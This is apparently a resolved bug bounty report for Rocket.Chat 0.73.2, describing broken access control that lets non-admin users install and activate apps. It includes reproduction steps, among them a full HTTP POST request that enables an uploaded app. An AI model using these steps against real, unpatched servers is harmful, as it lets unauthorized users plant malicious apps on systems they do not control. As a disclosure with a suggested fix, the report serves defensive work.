Loading HuntDB...

Broken access control on apps

Critical
R
Rocket.Chat
Submitted None
Reported by theappsec

Vulnerability Details

Technical details and impact analysis

Improper Access Control - Generic
**Summary:** The user without administrative privileges can upload and install any Application into the rocket.chat As ID of application is controlled in the app.json file (which is controlled by uploader) user can also activate the app. ## Releases Affected: * 0.73.2 ## Steps To Reproduce: - User log-in into the chat - User open the following link: ``` http://<rocket-chat.link>>/admin/app/install ``` - Upload any app - Activate it by send the following POST request to the installed app: ```http POST /api/apps/<ID_of_the_installed_App>/status HTTP/1.1 Host: rocket-chat.link User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-User-Id: [redacted] X-Auth-Token: [redacted] X-Requested-With: XMLHttpRequest Cookie: [redacted] DNT: 1 Connection: close Content-Length: 29 {"status":"manually_enabled"} ``` ## Supporting Material/References: You can see the uploading process in the attached video. Left user is admin, right - user without any additional privileges. ## Suggested mitigation Managing apps should be available to admins only. ## Impact Users can install and activate malicious apps into the rocket.chat.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Improper Access Control - Generic